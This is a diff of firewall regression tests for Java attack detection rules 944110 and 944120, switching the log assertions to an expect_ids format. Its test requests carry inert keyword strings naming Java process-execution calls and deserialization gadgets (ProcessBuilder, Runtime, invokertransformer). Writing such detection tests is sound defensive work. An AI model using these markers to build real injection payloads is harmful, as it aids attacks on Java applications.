@@ -179,7 +186,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 10 desc: Request header test includes keywords java. and ProcessBuilder stages: @@ -199,7 +207,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 11 desc: XML element includes keywords java. and Runtime stages: @@ -218,7 +227,8 @@ tests: version: HTTP/1.0 data: "value" output: - no_log_contains: "id \"944110\"" + log: + no_expect_ids: [944110] - test_id: 12 desc: XML attribute name includes keywords java. and Runtime stages: @@ -237,7 +247,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - no_log_contains: "id \"944110\"" + log: + no_expect_ids: [944110] - test_id: 13 desc: XML attribute value includes keywords java. and Runtime stages: @@ -256,7 +267,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 14 desc: XML element value includes keywords java. and Runtime stages: @@ -275,7 +287,8 @@ tests: version: HTTP/1.0 data: "java.Runtime" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 15 desc: XML element includes keywords java. and ProcessBuilder stages: @@ -294,7 +307,8 @@ tests: version: HTTP/1.0 data: "value" output: - no_log_contains: "id \"944110\"" + log: + no_expect_ids: [944110] - test_id: 16 desc: XML attribute name includes keyworda java. and ProcessBuilder stages: @@ -313,7 +327,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - no_log_contains: "id \"944110\"" + log: + no_expect_ids: [944110] - test_id: 17 desc: XML attribute value includes keywords java. and ProcessBuilder stages: 
@@ -332,7 +347,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 18 desc: XML element value includes keywords java. and ProcessBuilder stages: @@ -351,4 +367,5 @@ tests: version: HTTP/1.0 data: "java.ProcessBuilder" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml index 3701d12e9..f4b8e75e1 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml @@ -22,7 +22,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.clonetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 2 desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -41,7 +42,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.clonetransformer=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 3 desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -61,7 +63,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 4 desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -81,7 +84,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 5 desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -101,7 +105,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 6 desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" stages: 
@@ -120,7 +125,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 7 desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -139,7 +145,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 8 desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -158,7 +165,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 9 desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -177,7 +185,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.clonetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 10 desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -196,7 +205,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.clonetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 11 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -215,7 +225,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.clonetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 12 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -234,7 +245,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 13 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: 
@@ -253,7 +265,8 @@ tests: version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -278,7 +291,8 @@ tests: {"ProcessBuilder.evil.clonetransformer": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -303,7 +317,8 @@ tests: {"ProcessBuilder.evil.clonetransformer": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -328,7 +343,8 @@ tests: ProcessBuilder.evil.clonetransformer -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -353,7 +369,8 @@ tests: ProcessBuilder.evil.clonetransformer -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 18 desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" stages: @@ -372,7 +389,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.forclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 19 desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" stages: 
@@ -391,7 +409,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.forclosure=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 20 desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" stages: @@ -411,7 +430,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 21 desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" stages: @@ -431,7 +451,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 22 desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" stages: @@ -451,7 +472,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 23 desc: "XML element includes keyword ProcessBuilder.evil.forclosure" stages: @@ -470,7 +492,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 24 desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" stages: @@ -489,7 +512,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 25 desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" stages: @@ -508,7 +532,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 26 desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" stages: @@ -527,7 +552,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.forclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 27 desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" stages: 
@@ -546,7 +572,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.forclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 28 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" stages: @@ -565,7 +592,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.forclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 29 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" stages: @@ -584,7 +612,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 30 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" stages: @@ -603,7 +632,8 @@ tests: version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" stages: @@ -628,7 +658,8 @@ tests: {"ProcessBuilder.evil.forclosure": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" stages: @@ -653,7 +684,8 @@ tests: {"ProcessBuilder.evil.forclosure": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: 
@@ -678,7 +710,8 @@ tests: ProcessBuilder.evil.forclosure -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: @@ -703,7 +736,8 @@ tests: ProcessBuilder.evil.forclosure -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 35 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -722,7 +756,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 36 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -741,7 +776,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatefactory=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 37 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -761,7 +797,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 38 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -781,7 +818,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 39 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -801,7 +839,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 40 desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" stages: 
@@ -820,7 +859,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 41 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -839,7 +879,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 42 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -858,7 +899,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 43 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -877,7 +919,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 44 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -896,7 +939,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 45 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -915,7 +959,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 46 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -934,7 +979,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 47 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: 
@@ -953,7 +999,8 @@ tests: version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -978,7 +1025,8 @@ tests: {"ProcessBuilder.evil.instantiatefactory": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -1003,7 +1051,8 @@ tests: {"ProcessBuilder.evil.instantiatefactory": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -1028,7 +1077,8 @@ tests: ProcessBuilder.evil.instantiatefactory -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -1053,7 +1103,8 @@ tests: ProcessBuilder.evil.instantiatefactory -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 52 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1072,7 +1123,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 53 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: 
@@ -1091,7 +1143,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatetransformer=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 54 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1111,7 +1164,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 55 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1131,7 +1185,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 56 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1151,7 +1206,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 57 desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1170,7 +1226,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 58 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1189,7 +1246,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 59 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1208,7 +1266,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 60 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: 
@@ -1227,7 +1286,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 61 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1246,7 +1306,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 62 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1265,7 +1326,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 63 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1284,7 +1346,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 64 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1303,7 +1366,8 @@ tests: version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 65 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1328,7 +1392,8 @@ tests: {"ProcessBuilder.evil.instantiatetransformer": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 66 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: 
@@ -1353,7 +1418,8 @@ tests: {"ProcessBuilder.evil.instantiatetransformer": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 67 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1378,7 +1444,8 @@ tests: ProcessBuilder.evil.instantiatetransformer -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 68 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1403,7 +1470,8 @@ tests: ProcessBuilder.evil.instantiatetransformer -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 69 desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1422,7 +1490,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.invokertransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 70 desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1441,7 +1510,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.invokertransformer=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 71 desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1461,7 +1531,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 72 desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1481,7 +1552,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 73 desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" stages: 
@@ -1501,7 +1573,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 74 desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1520,7 +1593,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 75 desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1539,7 +1613,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 76 desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1558,7 +1633,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 77 desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1577,7 +1653,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.invokertransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 78 desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1596,7 +1673,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.invokertransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 79 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1615,7 +1693,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.invokertransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 80 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: 
@@ -1634,7 +1713,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 81 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1653,7 +1733,8 @@ tests: version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 82 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1678,7 +1759,8 @@ tests: {"ProcessBuilder.evil.invokertransformer": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 83 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1703,7 +1785,8 @@ tests: {"ProcessBuilder.evil.invokertransformer": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 84 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1728,7 +1811,8 @@ tests: ProcessBuilder.evil.invokertransformer -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 85 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1753,7 +1837,8 @@ tests: ProcessBuilder.evil.invokertransformer -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 86 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: 
@@ -1772,7 +1857,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeclonefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 87 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1791,7 +1877,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeclonefactory=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 88 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1811,7 +1898,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 89 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1831,7 +1919,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 90 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1851,7 +1940,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 91 desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1870,7 +1960,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 92 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1889,7 +1980,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 93 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: 
@@ -1908,7 +2000,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 94 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1927,7 +2020,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeclonefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 95 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1946,7 +2040,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeclonefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 96 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1965,7 +2060,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeclonefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 97 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1984,7 +2080,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 98 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -2003,7 +2100,8 @@ tests: version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 99 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: 
@@ -2028,7 +2126,8 @@ tests: {"ProcessBuilder.evil.prototypeclonefactory": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 100 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -2053,7 +2152,8 @@ tests: {"ProcessBuilder.evil.prototypeclonefactory": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 101 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -2078,7 +2178,8 @@ tests: ProcessBuilder.evil.prototypeclonefactory -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 102 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -2103,7 +2204,8 @@ tests: ProcessBuilder.evil.prototypeclonefactory -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 103 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2122,7 +2224,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeserializationfactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 104 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2141,7 +2244,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeserializationfactory=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 105 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: 
